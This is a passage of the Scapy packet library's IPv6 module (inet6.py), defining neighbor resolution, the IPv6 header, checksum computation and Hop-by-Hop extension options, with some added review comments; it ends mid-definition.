1#############################################################################
2#                                                                           #
3#  inet6.py --- IPv6 support for Scapy                                      #
4#               see http://natisbad.org/IPv6/                               #
5#               for more information                                        #
6#                                                                           #
7#  Copyright (C) 2005  Guillaume Valadon <guedou@hongo.wide.ad.jp>          #
8#                      Arnaud Ebalard <arnaud.ebalard@eads.net>             #
9#                                                                           #
10#  This program is free software; you can redistribute it and/or modify it  #
11#  under the terms of the GNU General Public License version 2 as           #
12#  published by the Free Software Foundation.                               #
13#                                                                           #
14#  This program is distributed in the hope that it will be useful, but      #
15#  WITHOUT ANY WARRANTY; without even the implied warranty of               #
16#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU        #
17#  General Public License for more details.                                 #
18#                                                                           #
19#############################################################################
20
21"""
22IPv6 (Internet Protocol v6).
23"""
24
25
26from __future__ import absolute_import
27from __future__ import print_function
28
29from hashlib import md5
30import random
31import socket
32import struct
33from time import gmtime, strftime
34
35from scapy.arch import get_if_hwaddr
36from scapy.as_resolvers import AS_resolver_riswhois
37from scapy.base_classes import Gen
38from scapy.compat import chb, orb, raw, plain_str, bytes_encode
39from scapy.config import conf
40from scapy.data import DLT_IPV6, DLT_RAW, DLT_RAW_ALT, ETHER_ANY, ETH_P_IPV6, \
41    MTU
42from scapy.error import log_runtime, warning
43from scapy.fields import BitEnumField, BitField, ByteEnumField, ByteField, \
44    DestIP6Field, FieldLenField, FlagsField, IntField, IP6Field, \
45    LongField, MACField, PacketLenField, PacketListField, ShortEnumField, \
46    ShortField, SourceIP6Field, StrField, StrFixedLenField, StrLenField, \
47    X3BytesField, XBitField, XIntField, XShortField
48from scapy.layers.inet import IP, IPTools, TCP, TCPerror, TracerouteResult, \
49    UDP, UDPerror
50from scapy.layers.l2 import CookedLinux, Ether, GRE, Loopback, SNAP
51import scapy.modules.six as six
52from scapy.packet import bind_layers, Packet, Raw
53from scapy.sendrecv import sendp, sniff, sr, srp1
54from scapy.supersocket import SuperSocket, L3RawSocket
55from scapy.utils import checksum, strxor
56from scapy.pton_ntop import inet_pton, inet_ntop
57from scapy.utils6 import in6_getnsma, in6_getnsmac, in6_isaddr6to4, \
58    in6_isaddrllallnodes, in6_isaddrllallservers, in6_isaddrTeredo, \
59    in6_isllsnmaddr, in6_ismaddr, Net6, teredoAddrExtractInfo
60from scapy.volatile import RandInt, RandShort
61
# This module cannot work without IPv6 support in the socket module.
if not socket.has_ipv6:
    raise socket.error("can't use AF_INET6, IPv6 is disabled")
# Define the protocol constants below when the socket module lacks them.
if not hasattr(socket, "IPPROTO_IPV6"):
    # Workaround for http://bugs.python.org/issue6926
    socket.IPPROTO_IPV6 = 41
if not hasattr(socket, "IPPROTO_IPIP"):
    # Workaround for https://bitbucket.org/secdev/scapy/issue/5119
    socket.IPPROTO_IPIP = 4

if conf.route6 is None:
    # unused import, only to initialize conf.route6
    import scapy.route6  # noqa: F401

##########################
#  Neighbor cache stuff  #
##########################

# Cache read and filled by getmacbyip6() (IPv6 address -> MAC address).
# NOTE(review): 120 is presumably the entry lifetime in seconds - confirm
# against the netcache implementation.
conf.netcache.new_cache("in6_neighbor", 120)
80
81
@conf.commands.register
def neighsol(addr, src, iface, timeout=1, chainCC=0):
    """Send an ICMPv6 Neighbor Solicitation and return the answer, if any.

    The solicitation asks for the MAC address of the neighbor owning the
    IPv6 address 'addr'. It is sent to the solicited-node multicast address
    derived from 'addr' (and to the matching multicast MAC address).

    :param addr: IPv6 address to resolve
    :param src: IPv6 address used as source of the message
    :param iface: interface the message is sent on; its hardware address is
        advertised in the Source Link-Layer Address option
    :param timeout: time to wait for an answer, 1 second by default
    :param chainCC: passed unchanged to srp1()
    :return: the answer (ethernet frame), or None if no answer is gathered
    """

    nsma = in6_getnsma(inet_pton(socket.AF_INET6, addr))
    d = inet_ntop(socket.AF_INET6, nsma)
    dm = in6_getnsmac(nsma)
    p = Ether(dst=dm) / IPv6(dst=d, src=src, hlim=255)
    p /= ICMPv6ND_NS(tgt=addr)
    p /= ICMPv6NDOptSrcLLAddr(lladdr=get_if_hwaddr(iface))
    # Honor the caller's timeout (it used to be hard-coded to 1 here)
    res = srp1(p, type=ETH_P_IPV6, iface=iface, timeout=timeout, verbose=0,
               chainCC=chainCC)

    return res
106
107
@conf.commands.register
def getmacbyip6(ip6, chainCC=0):
    """Return the MAC address to use to reach an IPv6 address

    Resolution steps, in order:
    - a multicast address is mapped directly with in6_getnsmac()
    - the IPv6 routing table gives the output interface, the source
      address and the next hop; the loopback interface always yields
      the broadcast MAC address
    - the "in6_neighbor" cache is looked up for the next hop (or for the
      address itself when there is no next hop)
    - otherwise a Neighbor Solicitation is sent with neighsol() and a
      successful answer is stored in the cache

    (chainCC parameter value ends up being passed to the sending function
     used to perform the resolution, if needed)

    None is returned when the resolution fails.
    """

    if isinstance(ip6, Net6):
        ip6 = str(ip6)

    # Multicast: no resolution needed
    if in6_ismaddr(ip6):
        return in6_getnsmac(inet_pton(socket.AF_INET6, ip6))

    iff, a, nh = conf.route6.route(ip6)

    if iff == conf.loopback_name:
        return "ff:ff:ff:ff:ff:ff"

    # Resolve the next hop when the route provides one
    target = ip6 if nh == '::' else nh

    cached = conf.netcache.in6_neighbor.get(target)
    if cached:
        return cached

    reply = neighsol(target, a, iff, chainCC=chainCC)
    if reply is None:
        return None

    if ICMPv6NDOptDstLLAddr in reply:
        mac = reply[ICMPv6NDOptDstLLAddr].lladdr
    else:
        mac = reply.src
    conf.netcache.in6_neighbor[target] = mac
    return mac
149
150
151#############################################################################
152#############################################################################
153#                                IPv6 Class                                 #
154#############################################################################
155#############################################################################
156
# Next Header value -> human readable protocol name. Used as the enumeration
# of the "nh" fields (IPv6 header and extension headers).
ipv6nh = {0: "Hop-by-Hop Option Header",
          4: "IP",
          6: "TCP",
          17: "UDP",
          41: "IPv6",
          43: "Routing Header",
          44: "Fragment Header",
          47: "GRE",
          50: "ESP Header",
          51: "AH Header",
          58: "ICMPv6",
          59: "No Next Header",
          60: "Destination Option Header",
          112: "VRRP",
          132: "SCTP",
          135: "Mobility Header"}

# Next Header value -> name (given as a string) of the class dissecting the
# payload. Looked up by _IPv6GuessPayload.default_payload_class(), which
# falls back to Raw for values that are not listed.
ipv6nhcls = {0: "IPv6ExtHdrHopByHop",
             4: "IP",
             6: "TCP",
             17: "UDP",
             43: "IPv6ExtHdrRouting",
             44: "IPv6ExtHdrFragment",
             50: "ESP",
             51: "AH",
             58: "ICMPv6Unknown",
             59: "Raw",
             60: "IPv6ExtHdrDestOpt"}
185
186
class IP6ListField(StrField):
    """Field holding a list of IPv6 addresses, 16 bytes each on the wire.

    The number of addresses to dissect is bounded either by a byte length
    (length_from) or by an address count (count_from); length_from takes
    precedence when both are given. Without any of them, the whole
    remaining string is consumed.
    """
    __slots__ = ["count_from", "length_from"]
    islist = 1

    def __init__(self, name, default, count_from=None, length_from=None):
        StrField.__init__(self, name, [] if default is None else default)
        self.count_from = count_from
        self.length_from = length_from

    def i2len(self, pkt, i):
        """Length in bytes of the list once packed."""
        return len(i) * 16

    def i2count(self, pkt, i):
        """Number of addresses in the list (0 if the value is not a list)."""
        return len(i) if isinstance(i, list) else 0

    def getfield(self, pkt, s):
        """Dissect addresses from s; return (remaining bytes, addresses)."""
        byte_limit = None
        addr_limit = None
        if self.length_from is not None:
            byte_limit = self.length_from(pkt)
        elif self.count_from is not None:
            addr_limit = self.count_from(pkt)

        if byte_limit is None:
            pending, trailer = s, b""
        else:
            pending, trailer = s[:byte_limit], s[byte_limit:]

        addresses = []
        while pending:
            if addr_limit is not None:
                if addr_limit <= 0:
                    break
                addr_limit -= 1
            addresses.append(inet_ntop(socket.AF_INET6, pending[:16]))
            pending = pending[16:]
        return pending + trailer, addresses

    def i2m(self, pkt, x):
        """Pack every address; values that are not addresses are resolved."""
        packed = []
        for item in x:
            try:
                chunk = inet_pton(socket.AF_INET6, item)
            except Exception:
                # Not a literal address: try a name resolution
                resolved = socket.getaddrinfo(item, None,
                                              socket.AF_INET6)[0][-1][0]
                chunk = inet_pton(socket.AF_INET6, resolved)
            packed.append(chunk)
        return b"".join(packed)

    def i2repr(self, pkt, x):
        if x is None:
            return "[]"
        return "[ %s ]" % ", ".join('%s' % y for y in x)
246
247
class _IPv6GuessPayload:
    name = "Dummy class that implements guess_payload_class() for IPv6"

    def default_payload_class(self, p):
        """Select the class of the payload from self.nh and the payload bytes.

        :param p: raw bytes of the payload
        :return: the class to use; Raw when nothing better is known. Payloads
            too short to be inspected never raise, they fall back to the
            generic choice.
        """
        if self.nh == 58:  # ICMPv6
            if not p:
                # No type byte to look at
                return Raw
            t = orb(p[0])
            if len(p) > 2 and (t == 139 or t == 140):  # Node Info Query
                return _niquery_guesser(p)
            if len(p) >= icmp6typesminhdrlen.get(t, float("inf")):  # Other ICMPv6 messages  # noqa: E501
                if t == 130 and len(p) >= 28:
                    # RFC 3810 - 8.1. Query Version Distinctions
                    return ICMPv6MLQuery2
                return icmp6typescls.get(t, Raw)
            return Raw
        elif self.nh == 135 and len(p) > 3:  # Mobile IPv6
            return _mip6_mhtype2cls.get(orb(p[2]), MIP6MH_Generic)
        elif self.nh == 43 and len(p) > 2 and orb(p[2]) == 4:
            # Segment Routing header (routing type 4). The length check keeps
            # a truncated Routing header from raising IndexError.
            return IPv6ExtHdrSegmentRouting
        return ipv6nhcls.get(self.nh, Raw)
267
268
class IPv6(_IPv6GuessPayload, Packet, IPTools):
    """IPv6 header.

    'plen' is computed at build time when left to None. The class of the
    payload is guessed by _IPv6GuessPayload.default_payload_class().
    """
    name = "IPv6"
    fields_desc = [BitField("version", 6, 4),
                   BitField("tc", 0, 8),
                   BitField("fl", 0, 20),
                   ShortField("plen", None),
                   ByteEnumField("nh", 59, ipv6nh),
                   ByteField("hlim", 64),
                   SourceIP6Field("src", "dst"),  # dst is for src @ selection
                   DestIP6Field("dst", "::1")]

    def route(self):
        """Used to select the L2 address"""
        dst = self.dst
        if isinstance(dst, Gen):
            # Several destinations: route according to the first one
            dst = next(iter(dst))
        return conf.route6.route(dst)

    def mysummary(self):
        return "%s > %s (%i)" % (self.src, self.dst, self.nh)

    def post_build(self, p, pay):
        """Append the payload and fill in 'plen' if it was left to None."""
        p += pay
        if self.plen is None:
            # Everything after the 40 bytes of the IPv6 header
            tmp_len = len(p) - 40
            p = p[:4] + struct.pack("!H", tmp_len) + p[6:]
        return p

    def extract_padding(self, data):
        """Extract the IPv6 payload

        Returns (payload, padding). The payload length is 'plen', except
        when plen is 0 and a Hop-by-Hop header follows: the length is then
        taken from the Jumbo option of that header.
        """

        if self.plen == 0 and self.nh == 0 and len(data) >= 8:
            # Extract Hop-by-Hop extension length
            hbh_len = 8 + orb(data[1]) * 8

            # Extract length from the Jumbogram option
            # Note: the following algorithm take advantage of the Jumbo option
            #        mandatory alignment (4n + 2, RFC2675 Section 2)
            jumbo_len = None
            # Options live inside the Hop-by-Hop header only; never look
            # further, nor past the end of the available bytes.
            opts_end = min(hbh_len, len(data))
            # A Jumbo option is 6 bytes long (type, length, 32-bit value):
            # only consider offsets where it entirely fits.
            for offset in range(2, opts_end - 5, 4):
                if orb(data[offset]) == 0xc2:  # Jumbo option
                    # The length is a 32-bit integer in network byte order
                    jumbo_len = struct.unpack(
                        "!I", data[offset + 2:offset + 6]
                    )[0]
                    break

            if jumbo_len is None:
                log_runtime.info("Scapy did not find a Jumbo option")
                jumbo_len = 0

            # NOTE(review): RFC 2675 defines the Jumbo Payload Length as
            # already including the Hop-by-Hop header; adding hbh_len is
            # kept as-is here - confirm whether this is intended.
            tmp_len = hbh_len + jumbo_len
        else:
            tmp_len = self.plen

        return data[:tmp_len], data[tmp_len:]

    def hashret(self):
        """Return the bytes used to pair a request with its answers."""
        if self.nh == 58 and isinstance(self.payload, _ICMPv6):
            if self.payload.type < 128:
                # ICMPv6 error: hash on the quoted packet
                return self.payload.payload.hashret()
            elif (self.payload.type in [133, 134, 135, 136, 144, 145]):
                return struct.pack("B", self.nh) + self.payload.hashret()

        if not conf.checkIPinIP and self.nh in [4, 41]:  # IP, IPv6
            return self.payload.hashret()

        nh = self.nh
        sd = self.dst
        ss = self.src
        if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrRouting):
            # With routing header, the destination is the last
            # address of the IPv6 list if segleft > 0
            nh = self.payload.nh
            try:
                sd = self.addresses[-1]
            except IndexError:
                sd = '::1'
            # TODO: big bug with ICMPv6 error messages as the destination of IPerror6  # noqa: E501
            #       could be anything from the original list ...
            sd = inet_pton(socket.AF_INET6, sd)
            for a in self.addresses:
                a = inet_pton(socket.AF_INET6, a)
                sd = strxor(sd, a)
            sd = inet_ntop(socket.AF_INET6, sd)

        if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrSegmentRouting):  # noqa: E501
            # With segment routing header (rh == 4), the destination is
            # the first address of the IPv6 addresses list
            try:
                sd = self.addresses[0]
            except IndexError:
                sd = self.dst

        if self.nh == 44 and isinstance(self.payload, IPv6ExtHdrFragment):
            nh = self.payload.nh

        if self.nh == 0 and isinstance(self.payload, IPv6ExtHdrHopByHop):
            nh = self.payload.nh

        if self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt):
            foundhao = None
            for o in self.payload.options:
                if isinstance(o, HAO):
                    foundhao = o
            if foundhao:
                nh = self.payload.nh  # XXX what if another extension follows ?
                ss = foundhao.hoa

        if conf.checkIPsrc and conf.checkIPaddr and not in6_ismaddr(sd):
            sd = inet_pton(socket.AF_INET6, sd)
            ss = inet_pton(socket.AF_INET6, ss)
            return strxor(sd, ss) + struct.pack("B", nh) + self.payload.hashret()  # noqa: E501
        else:
            return struct.pack("B", nh) + self.payload.hashret()

    def answers(self, other):
        """Tell whether self (a reply) answers other (a request)."""
        if not conf.checkIPinIP:  # skip IP in IP and IPv6 in IP
            if self.nh in [4, 41]:
                return self.payload.answers(other)
            if isinstance(other, IPv6) and other.nh in [4, 41]:
                return self.answers(other.payload)
            if isinstance(other, IP) and other.proto in [4, 41]:
                return self.answers(other.payload)
        if not isinstance(other, IPv6):  # self is reply, other is request
            return False
        if conf.checkIPaddr:
            # ss = inet_pton(socket.AF_INET6, self.src)
            sd = inet_pton(socket.AF_INET6, self.dst)
            os = inet_pton(socket.AF_INET6, other.src)
            od = inet_pton(socket.AF_INET6, other.dst)
            # request was sent to a multicast address (other.dst)
            # Check reply destination addr matches request source addr (i.e
            # sd == os) except when reply is multicasted too
            # XXX test mcast scope matching ?
            if in6_ismaddr(other.dst):
                if in6_ismaddr(self.dst):
                    if ((od == sd) or
                            (in6_isaddrllallnodes(self.dst) and in6_isaddrllallservers(other.dst))):  # noqa: E501
                        return self.payload.answers(other.payload)
                    return False
                if (os == sd):
                    return self.payload.answers(other.payload)
                return False
            elif (sd != os):  # or ss != od): <- removed for ICMP errors
                return False
        if self.nh == 58 and isinstance(self.payload, _ICMPv6) and self.payload.type < 128:  # noqa: E501
            # ICMPv6 Error message -> generated by IPv6 packet
            # Note : at the moment, we jump the ICMPv6 specific class
            # to call answers() method of erroneous packet (over
            # initial packet). There can be cases where an ICMPv6 error
            # class could implement a specific answers method that perform
            # a specific task. Currently, don't see any use ...
            return self.payload.payload.answers(other)
        elif other.nh == 0 and isinstance(other.payload, IPv6ExtHdrHopByHop):
            return self.payload.answers(other.payload)
        elif other.nh == 44 and isinstance(other.payload, IPv6ExtHdrFragment):
            return self.payload.answers(other.payload.payload)
        elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrRouting):
            return self.payload.answers(other.payload.payload)  # Buggy if self.payload is a IPv6ExtHdrRouting  # noqa: E501
        elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrSegmentRouting):  # noqa: E501
            return self.payload.answers(other.payload.payload)  # Buggy if self.payload is a IPv6ExtHdrRouting  # noqa: E501
        elif other.nh == 60 and isinstance(other.payload, IPv6ExtHdrDestOpt):
            return self.payload.payload.answers(other.payload.payload)
        elif self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt):  # BU in reply to BRR, for instance  # noqa: E501
            return self.payload.payload.answers(other.payload)
        else:
            if (self.nh != other.nh):
                return False
            return self.payload.answers(other.payload)
443
444
class IPv46(IP):
    """
    Dispatcher used to detect the IP version while parsing Raw IP pcap
    files: IPv6 is selected when the version is 6, IP otherwise.
    """
    @classmethod
    def dispatch_hook(cls, _pkt=None, *_, **kargs):
        if _pkt:
            # Dissection: the version is the high nibble of the first byte
            version = orb(_pkt[0]) >> 4
        else:
            # Construction: rely on the 'version' keyword, if any
            version = kargs.get("version")
        return IPv6 if version == 6 else IP
458
459
def inet6_register_l3(l2, l3):
    """Return the MAC address to use for the destination of the l3 layer.

    The l2 argument is not used.
    """
    destination = l3.dst
    return getmacbyip6(destination)


# Resolver used for IPv6 carried over Ether
conf.neighbor.register_l3(Ether, IPv6, inet6_register_l3)
465
466
class IPerror6(IPv6):
    """IPv6 header of a packet quoted inside an ICMPv6 error message."""
    name = "IPv6 in ICMPv6"

    @staticmethod
    def _same_leading_bytes(first, second):
        """Compare the raw bytes of two layers over their common length."""
        s1 = raw(first)
        s2 = raw(second)
        tmp_len = min(len(s1), len(s2))
        return s1[:tmp_len] == s2[:tmp_len]

    def answers(self, other):
        """Tell whether this quoted packet matches the sent packet 'other'.

        Source addresses must match; destination addresses must match too,
        unless the request carries a Routing header. The upper layers (past
        extension headers) are then compared byte for byte over their common
        length. TCP options, checksum and data offset are left out of the
        comparison when options differ (possible MSS clamping).
        """
        if not isinstance(other, IPv6):
            return False
        sd = inet_pton(socket.AF_INET6, self.dst)
        ss = inet_pton(socket.AF_INET6, self.src)
        od = inet_pton(socket.AF_INET6, other.dst)
        os = inet_pton(socket.AF_INET6, other.src)

        # Make sure that the ICMPv6 error is related to the packet scapy sent
        if not (isinstance(self.underlayer, _ICMPv6) and
                self.underlayer.type < 128):
            return False

        # find upper layer for self (possible citation)
        selfup = self.payload
        while selfup is not None and isinstance(selfup, _IPv6ExtHdr):
            selfup = selfup.payload

        # find upper layer for other (initial packet). Also look for RH
        otherup = other.payload
        request_has_rh = False
        while otherup is not None and isinstance(otherup, _IPv6ExtHdr):
            if isinstance(otherup, IPv6ExtHdrRouting):
                request_has_rh = True
            otherup = otherup.payload

        if not ((ss == os and sd == od) or  # < Basic case
                (ss == os and request_has_rh)):
            # ^ Request has a RH : don't check dst address
            return False

        # Let's deal with possible MSS Clamping
        clamped = (isinstance(selfup, TCP) and
                   isinstance(otherup, TCP) and
                   selfup.options != otherup.options)
        if not clamped:
            return self._same_leading_bytes(selfup, otherup)

        # Save fields modified by MSS clamping
        saved = [(layer, fname, getattr(layer, fname))
                 for layer in (otherup, selfup)
                 for fname in ("options", "chksum", "dataofs")]
        try:
            # Nullify them
            for layer, fname, _ in saved:
                setattr(layer, fname, [] if fname == "options" else 0)
            # Test it
            return self._same_leading_bytes(selfup, otherup)
        finally:
            # Recall saved values, even if building the packets failed:
            # 'other' belongs to the caller and must not stay modified.
            for layer, fname, value in saved:
                setattr(layer, fname, value)

    def mysummary(self):
        return Packet.mysummary(self)
544
545
546#############################################################################
547#############################################################################
548#                 Upper Layer Checksum computation                          #
549#############################################################################
550#############################################################################
551
class PseudoIPv6(Packet):  # IPv6 Pseudo-header for checksum computation
    """Pseudo-header filled in and serialized by in6_chksum().

    It is only used as input of the checksum computation.
    """
    name = "Pseudo IPv6 Header"
    # NOTE(review): "uplen" is a ShortField, so upper layer lengths that do
    # not fit in 16 bits presumably cannot be represented - confirm.
    fields_desc = [IP6Field("src", "::"),
                   IP6Field("dst", "::"),
                   ShortField("uplen", None),
                   BitField("zero", 0, 24),
                   ByteField("nh", 0)]
559
560
def in6_chksum(nh, u, p):
    """
    Compute the IPv6 Upper Layer checksum (RFC 2460 - 8.1 Upper-Layer
    Checksums).

    A PseudoIPv6 instance is filled with:
    - the Next Header value
    - the _final_ destination address: the last address of a Routing Header
    (first address for a Segment Routing Header) found in the underlayers
    with a non null segleft and a non empty address list, else the
    destination of the IPv6 underlayer
    - the _real_ source address: the home address of a Destination Option
    header made of a single HAO option, else the source of the IPv6
    underlayer
    - the length of the provided payload string ('p')

    The checksum is computed over the pseudo header followed by 'p'. When
    no IPv6 underlayer is found, a warning is emitted and 0 is returned.

    :param nh: value of upper layer protocol
    :param u: upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be
        provided with all under layers (IPv6 and all extension headers,
        for example)
    :param p: the payload of the upper layer provided as a string
    """

    pseudo = PseudoIPv6()
    pseudo.nh = nh

    final_dst = 0
    home_addr = 0
    dst_locked = False  # only the first matching routing header counts

    # Walk down the layers until the IPv6 header
    layer = u
    while layer is not None and not isinstance(layer, IPv6):
        if (isinstance(layer, IPv6ExtHdrRouting) and
                layer.segleft != 0 and len(layer.addresses) != 0 and
                not dst_locked):
            final_dst = layer.addresses[-1]
            dst_locked = True
        elif (isinstance(layer, IPv6ExtHdrSegmentRouting) and
              layer.segleft != 0 and len(layer.addresses) != 0 and
              not dst_locked):
            final_dst = layer.addresses[0]
            dst_locked = True
        elif (isinstance(layer, IPv6ExtHdrDestOpt) and
              (len(layer.options) == 1) and
              isinstance(layer.options[0], HAO)):
            home_addr = layer.options[0].hoa
        layer = layer.underlayer

    if layer is None:
        warning("No IPv6 underlayer to compute checksum. Leaving null.")
        return 0

    pseudo.src = home_addr if home_addr else layer.src
    pseudo.dst = final_dst if final_dst else layer.dst
    pseudo.uplen = len(p)
    return checksum(raw(pseudo) + p)
619
620
621#############################################################################
622#############################################################################
623#                           Extension Headers                               #
624#############################################################################
625#############################################################################
626
627
628# Inherited by all extension header classes
class _IPv6ExtHdr(_IPv6GuessPayload, Packet):
    """Common base of the IPv6 extension header classes.

    The class of the payload is guessed by
    _IPv6GuessPayload.default_payload_class().
    """
    name = 'Abstract IPv6 Option Header'
    aliastypes = [IPv6, IPerror6]  # TODO ...
632
633
634#                    IPv6 options for Extension Headers                     #
635
# Option Type value -> option name. Given to the _OTypeField "otype" field
# of the option classes as its enumeration.
_hbhopts = {0x00: "Pad1",
            0x01: "PadN",
            0x04: "Tunnel Encapsulation Limit",
            0x05: "Router Alert",
            0x06: "Quick-Start",
            0xc2: "Jumbo Payload",
            0xc9: "Home Address Option"}
643
644
class _OTypeField(ByteEnumField):
    """
    Modified ByteEnumField that displays information regarding the IPv6
    option based on its option type value: what nodes that do not understand
    the option should do with it (bits 0xC0) and whether the option may
    change en-route (bit 0x20).

    It is used by Jumbo, Pad1, PadN, RouterAlert, HAO options
    """
    pol = {0x00: "00: skip",
           0x40: "01: discard",
           0x80: "10: discard+ICMP",
           0xC0: "11: discard+ICMP not mcast"}

    enroutechange = {0x00: "0: Don't change en-route",
                     0x20: "1: May change en-route"}

    def i2repr(self, pkt, x):
        label = self.i2s.get(x, repr(x))
        action = self.pol[x & 0xC0]
        mutability = self.enroutechange[x & 0x20]
        return "%s [%s, %s]" % (label, action, mutability)
666
667
class HBHOptUnknown(Packet):
    """IPv6 Hop-By-Hop option of unknown type (type, length, raw data).

    When dissecting, the option type byte selects a dedicated class from
    _hbhoptcls if there is one.
    """
    name = "Scapy6 Unknown Option"
    fields_desc = [
        _OTypeField("otype", 0x01, _hbhopts),
        FieldLenField("optlen", None, length_of="optdata", fmt="B"),
        StrLenField("optdata", "", length_from=lambda pkt: pkt.optlen),
    ]

    def alignment_delta(self, curpos):
        """
        Return the padding length required before this option.

        As specified in section 4.2 of RFC 2460, every option has an
        alignment requirement usually expressed xn+y, meaning the Option
        Type must appear at an integer multiple of x octets from the start
        of the header, plus y octets. 'curpos' is the current position from
        the start of the header.

        By default, there is no alignment requirement.
        """
        return 0

    @classmethod
    def dispatch_hook(cls, _pkt=None, *args, **kargs):
        if not _pkt:
            return cls
        # First byte is the option type
        return _hbhoptcls.get(orb(_pkt[0]), cls)

    def extract_padding(self, p):
        return b"", p
697
698
class Pad1(Packet):  # IPv6 Hop-By-Hop Option
    """Pad1 option: a single option type byte, without length nor data."""
    name = "Pad1"
    fields_desc = [_OTypeField("otype", 0x00, _hbhopts)]

    def alignment_delta(self, curpos):  # No alignment requirement
        """Return the padding length required before this option (none)."""
        return 0

    def extract_padding(self, p):
        # None of the following bytes is kept as payload of this option
        return b"", p
708
709
class PadN(Packet):  # IPv6 Hop-By-Hop Option
    """PadN option: option type, data length and 'optlen' bytes of data."""
    name = "PadN"
    fields_desc = [_OTypeField("otype", 0x01, _hbhopts),
                   # computed from the length of optdata when left to None
                   FieldLenField("optlen", None, length_of="optdata", fmt="B"),
                   StrLenField("optdata", "",
                               length_from=lambda pkt: pkt.optlen)]

    def alignment_delta(self, curpos):  # No alignment requirement
        """Return the padding length required before this option (none)."""
        return 0

    def extract_padding(self, p):
        # None of the following bytes is kept as payload of this option
        return b"", p
722
723
class RouterAlert(Packet):
    """Router Alert option (RFC 2711) - IPv6 Hop-By-Hop Option"""
    name = "Router Alert"
    fields_desc = [
        _OTypeField("otype", 0x05, _hbhopts),
        ByteField("optlen", 2),
        ShortEnumField("value", None,
                       {0: "Datagram contains a MLD message",
                        1: "Datagram contains RSVP message",
                        2: "Datagram contains an Active Network message",
                        68: "NSIS NATFW NSLP",
                        69: "MPLS OAM",
                        65535: "Reserved"}),
    ]
    # TODO : Check IANA has not defined new values for value field of RouterAlertOption  # noqa: E501
    # TODO : Now that we have that option, we should do something in MLD class that need it  # noqa: E501
    # TODO : IANA has defined ranges of values which can't be easily represented here.  # noqa: E501
    #        iana.org/assignments/ipv6-routeralert-values/ipv6-routeralert-values.xhtml

    def alignment_delta(self, curpos):
        """Padding needed from 'curpos' to reach the 2n+0 alignment."""
        return (0 - curpos) % 2

    def extract_padding(self, p):
        return b"", p
748
749
class Jumbo(Packet):
    """Jumbo Payload option - IPv6 Hop-By-Hop Option"""
    name = "Jumbo Payload"
    fields_desc = [
        _OTypeField("otype", 0xC2, _hbhopts),
        ByteField("optlen", 4),
        IntField("jumboplen", None),
    ]

    def alignment_delta(self, curpos):
        """Padding needed from 'curpos' to reach the 4n+2 alignment."""
        return (2 - curpos) % 4

    def extract_padding(self, p):
        return b"", p
764
765
class HAO(Packet):
    """Home Address Option - IPv6 Destination Options Header Option"""
    name = "Home Address Option"
    fields_desc = [
        _OTypeField("otype", 0xC9, _hbhopts),
        ByteField("optlen", 16),
        IP6Field("hoa", "::"),
    ]

    def alignment_delta(self, curpos):
        """Padding needed from 'curpos' to reach the 8n+6 alignment."""
        return (6 - curpos) % 8

    def extract_padding(self, p):
        return b"", p
780
781
# Option Type value -> class implementing the option. Consulted by
# HBHOptUnknown.dispatch_hook(); other types stay HBHOptUnknown.
_hbhoptcls = {0x00: Pad1,
              0x01: PadN,
              0x05: RouterAlert,
              0xC2: Jumbo,
              0xC9: HAO}
787
788
789#                         Hop-by-Hop Extension Header                       #
790
class _OptionsField(PacketListField):
    # List of options which, when built with 'autopad' enabled, inserts
    # Pad1/PadN options so that every option honours its alignment_delta()
    # and the whole run ends on a multiple of 8 octets (counted from curpos).
    __slots__ = ["curpos"]

    def __init__(self, name, default, cls, curpos, *args, **kargs):
        """Create the field.

        ``curpos`` is the offset at which the first option starts; it is the
        starting point for all alignment computations in i2m(). The other
        arguments are passed to PacketListField unchanged.
        """
        self.curpos = curpos
        PacketListField.__init__(self, name, default, cls, *args, **kargs)

    @staticmethod
    def _padding(length):
        """Return the bytes of the padding option used to fill ``length``.

        0 gives no padding, 1 gives a Pad1 option and anything larger gives
        a PadN option whose optdata is ``length - 2`` zero bytes.
        """
        if length == 0:
            return b""
        if length == 1:
            return raw(Pad1())
        return raw(PadN(optdata=b'\x00' * (length - 2)))

    def i2len(self, pkt, i):
        """Return the length of the built options, padding included."""
        return len(self.i2m(pkt, i))

    def i2m(self, pkt, x):
        """Build the list of options ``x`` into bytes.

        When the packet's 'autopad' attribute is false, the options are
        simply concatenated. Otherwise padding options are inserted before
        each option and at the end, as described on the class.
        """
        try:
            autopad = getattr(pkt, "autopad")  # Hack : 'autopad' phantom field
        except Exception:
            # No usable 'autopad' on pkt: behave as if it were enabled
            autopad = 1

        if not autopad:
            # Options are packets: they must be built with raw(), since
            # str objects cannot be joined into bytes.
            return b"".join(map(raw, x))

        curpos = self.curpos
        chunks = []
        for p in x:
            d = p.alignment_delta(curpos)
            chunks.append(self._padding(d))
            pstr = raw(p)
            chunks.append(pstr)
            curpos += d + len(pstr)

        # Let's make the class including our option field
        # a multiple of 8 octets long
        chunks.append(self._padding(-curpos % 8))
        return b"".join(chunks)

    def addfield(self, pkt, s, val):
        """Append the built (and possibly padded) options to ``s``."""
        return s + self.i2m(pkt, val)
839
840
class _PhantomAutoPadField(ByteField):
    # Field that takes no room on the wire: building adds nothing and
    # dissecting consumes nothing.

    def addfield(self, pkt, s, val):
        """Return ``s`` untouched: the field contributes no bytes."""
        return s

    def getfield(self, pkt, s):
        """Consume nothing from ``s`` and report the value 1."""
        remaining, value = s, 1
        return remaining, value

    def i2repr(self, pkt, x):
        """Render a truthy value as "On" and a falsy one as "Off"."""
        return "On" if x else "Off"
852
853
class IPv6ExtHdrHopByHop(_IPv6ExtHdr):
    # Hop-by-Hop Options extension header. When placed on top of IPv6, it
    # overloads the IPv6 'nh' field with 0.
    name = "IPv6 Extension Header - Hop-by-Hop Options Header"
    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
                   # len: options length plus the 2 leading bytes, rounded up
                   # to 8-octet units, minus one unit
                   FieldLenField("len", None, length_of="options", fmt="B",
                                 adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1),
                   _PhantomAutoPadField("autopad", 1),  # autopad activated by default  # noqa: E501
                   # options start at offset 2 (curpos argument); on
                   # dissection their length is derived back from 'len'
                   _OptionsField("options", [], HBHOptUnknown, 2,
